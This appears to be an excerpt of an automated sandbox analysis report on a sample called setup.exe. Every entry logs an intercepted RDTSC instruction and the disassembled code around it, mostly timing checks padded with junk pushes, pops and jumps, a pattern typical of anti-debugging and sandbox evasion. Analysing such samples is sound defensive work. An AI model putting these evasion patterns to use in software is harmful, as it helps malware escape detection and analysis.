Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AB3A8 second address: 5AB3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A289h 0x00000009 jmp 00007FC16945A289h 0x0000000e jmp 00007FC16945A287h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FC16945A276h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AB3FE second address: 5AB40A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AB40A second address: 5AB40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61E904 second address: 61E908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EA5A second address: 61EA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A283h 0x00000009 jg 00007FC16945A276h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EA78 second address: 61EA98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007FC169461A96h 0x0000000b jp 00007FC169461A96h 0x00000011 jnl 00007FC169461A96h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EA98 second address: 61EAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC16945A27Ah 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EAAF second address: 61EAB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EC22 second address: 61EC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EC26 second address: 61EC49 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC169461A96h 0x00000008 jmp 00007FC169461AA9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EF4C second address: 61EF54 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EF54 second address: 61EF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EF5C second address: 61EF74 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 jl 00007FC16945A276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FC16945A276h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61EF74 second address: 61EF7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61F0CC second address: 61F0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61F602 second address: 61F608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61F608 second address: 61F60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61F60C second address: 61F612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61F612 second address: 61F62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC16945A282h 0x0000000c jmp 00007FC16945A27Ch 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 628174 second address: 628179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 628179 second address: 628192 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC16945A27Bh 0x00000008 jp 00007FC16945A276h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 628192 second address: 628196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 626FD9 second address: 627019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC16945A281h 0x00000008 jmp 00007FC16945A285h 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007FC16945A276h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FC16945A276h 0x0000001e jnp 00007FC16945A276h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 627019 second address: 62701D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EA4C8 second address: 5EA4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC16945A276h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EA73F second address: 5EA745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EAD0E second address: 5EAD21 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC16945A278h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EAFC6 second address: 5EAFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC169461A9Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 jp 00007FC169461A9Ch 0x00000016 lea eax, dword ptr [ebp+1248EA70h] 0x0000001c sub edx, dword ptr [ebp+122D29EFh] 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A483F second address: 5A4852 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FC16945A276h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62735D second address: 62737F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007FC169461A96h 0x0000000c jmp 00007FC169461AA4h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62760E second address: 627618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 627618 second address: 62761C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62761C second address: 62763F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC16945A289h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62763F second address: 627649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC169461A96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 627649 second address: 62765F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC16945A27Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62765F second address: 627663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 627663 second address: 62766D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 627D81 second address: 627D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62D5D7 second address: 62D5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62C825 second address: 62C833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62C833 second address: 62C837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62C837 second address: 62C843 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62C843 second address: 62C847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62C847 second address: 62C856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62C856 second address: 62C85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62CDDE second address: 62CDED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 62CF3C second address: 62CF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 631178 second address: 63117C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63117C second address: 6311A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jo 00007FC16945A29Eh 0x0000000d pushad 0x0000000e jmp 00007FC16945A288h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63919E second address: 6391D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC169461AA1h 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007FC169461AA9h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6391D3 second address: 6391DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6391DB second address: 6391DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 59DDD6 second address: 59DDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 59DDDC second address: 59DDEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b ja 00007FC169461A96h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63C952 second address: 63C956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63C956 second address: 63C95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63CEC2 second address: 63CEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63CEC6 second address: 63CEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC169461A9Bh 0x00000011 jmp 00007FC169461A9Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 63D06D second address: 63D085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A284h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64373C second address: 64374C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 jnp 00007FC169461A9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 641FBD second address: 641FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 642158 second address: 64215E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64215E second address: 642173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6423D0 second address: 6423D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6423D6 second address: 6423DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6423DC second address: 642420 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FC169461A96h 0x00000009 jmp 00007FC169461AA2h 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FC169461AA8h 0x00000015 jmp 00007FC169461A9Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 642420 second address: 642439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FC16945A296h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC16945A27Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EA906 second address: 5EA90B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EA90B second address: 5EA98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FC16945A27Ch 0x0000000f pop edx 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FC16945A278h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b xor cl, 00000079h 0x0000002e mov ebx, dword ptr [ebp+1248EAAFh] 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FC16945A278h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e pushad 0x0000004f mov bh, ah 0x00000051 popad 0x00000052 add eax, ebx 0x00000054 mov edx, dword ptr [ebp+122D19DEh] 0x0000005a nop 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FC16945A284h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5EA98C second address: 5EAA1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC169461A9Ah 0x0000000f nop 0x00000010 pushad 0x00000011 xor dword ptr [ebp+1246A1FDh], edx 0x00000017 call 00007FC169461A9Ah 0x0000001c add edi, dword ptr [ebp+122D1D10h] 0x00000022 pop ebx 0x00000023 popad 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FC169461A98h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 jc 00007FC169461A99h 0x00000046 movsx edi, si 0x00000049 push edi 0x0000004a mov ch, bl 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 ja 00007FC169461AADh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64B3F4 second address: 64B3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64B3FC second address: 64B446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FC169461A9Dh 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007FC169461AABh 0x00000016 push ebx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b ja 00007FC169461A96h 0x00000021 push edi 0x00000022 pop edi 0x00000023 jnl 00007FC169461A96h 0x00000029 popad 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 59C328 second address: 59C32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 649414 second address: 649419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 649419 second address: 64941F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64941F second address: 64943D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC169461A96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC169461AA0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64943D second address: 649441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6496FC second address: 64971A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC169461AA0h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64971A second address: 64973B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 jmp 00007FC16945A27Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64973B second address: 649755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 649755 second address: 64976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A286h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64976F second address: 649779 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC169461A96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64A2A9 second address: 64A2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64A590 second address: 64A59B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC169461A96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CA6E second address: 64CA74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CA74 second address: 64CA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jns 00007FC169461A96h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CA8A second address: 64CA8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CA8F second address: 64CA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CA95 second address: 64CAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64CAA1 second address: 64CABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64F97C second address: 64F980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64F980 second address: 64F9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC169461AA3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 64FC68 second address: 64FC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
